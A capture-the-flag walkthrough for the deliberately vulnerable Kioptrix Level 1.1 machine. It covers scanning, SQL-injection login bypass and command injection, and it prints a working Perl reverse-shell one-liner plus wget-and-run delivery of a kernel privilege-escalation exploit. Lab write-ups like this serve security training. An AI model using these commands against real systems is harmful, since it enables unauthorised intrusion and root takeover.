Kioptrix: Level 1.1 (#2) Walkthrough
So,this the 2nd machine of the Kioptrix series. Kioptrix is a beginner boot2root series. Letz, get into it;
Link to the VM image:
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
Download the image file and Open the virtual image in your Vmware/Virtual Box
Enumeration:
So letz find out the IP of the Kioptrix. For that we use the command;
netdiscover
Nmap Scan
nmap -sC -sV 192.168.0.105
Port 80:
We visit the webpage hosted on port 80
http://192.168.0.105:80
Letz checkout the page source code :
ctrl+u
Till that time letz run a Gobuster in the background inorder to find the hidden directories.
gobuster dir -u http://192.168.0.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
As we have got the login page letz try for SQL Injection:
And Boom !! We are innn……..
I assume that the back-end sql statement was:
SELECT * FROM USERS WHERE username=’’ AND password=’’
EXPLOITATION:
Now letz try Command Injection.Using the Wappalyzer extension we know that the page is PHP based so;
And we got the command executed.
This means there is possibility of RCE(Remote Code Execute) using a reverse shell. Letz check whether bash or python is installed on the victim machine
;bash — version
We get the output. That measns bash is installed on the machine so we can get a bash reverse shell.
For some reasons I was not able to bash rev shell so tried for perl.
;perl -v
We refer Pentest Monkey for Reverse Shell.
In our terminal we use netcat in listening mode so that we can get the shell in our terminal
nc -nlvp 443
perl -e 'use Socket;$i="192.168.0.104";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
192.168.0.104:- My Kali Linux Machine IP
Hurray !! we got the shell
POST EXPLOITATION:
So now letz escalate our privileges:
Check the Kernel version number;
cat /proc/version
Search google for the Kernel exploit.We got the exploit
https://www.exploit-db.com/exploits/9542
So we letz copy the exploit the exploit.
gedit exploit.c
Copy paste the code in the file.
This exploit is an old exploit hence it throws error when we compile it with gcc compiler.And the flag -m32 was working in my case;so we choose “clang” which comes pre-installed in Kali linux.
clang -o exploit -m32 exploit.c
Now letz place this exploit in our Apache server Directory
mv exploit /var/www/html
Letz start our Apache sever:
service apache2 start
Now in letz open our reverse shell and traverse to /tmp directory ;as this is the directory which has all the permissions(read,write,execute)
wget 192.168.0.104/exploit
ls
chmod 755 exploit
Now run the exploit.
./exploit
And we are the root.
So this was the second machine of the kioptrix series.Stay tuned for the other machines of this series.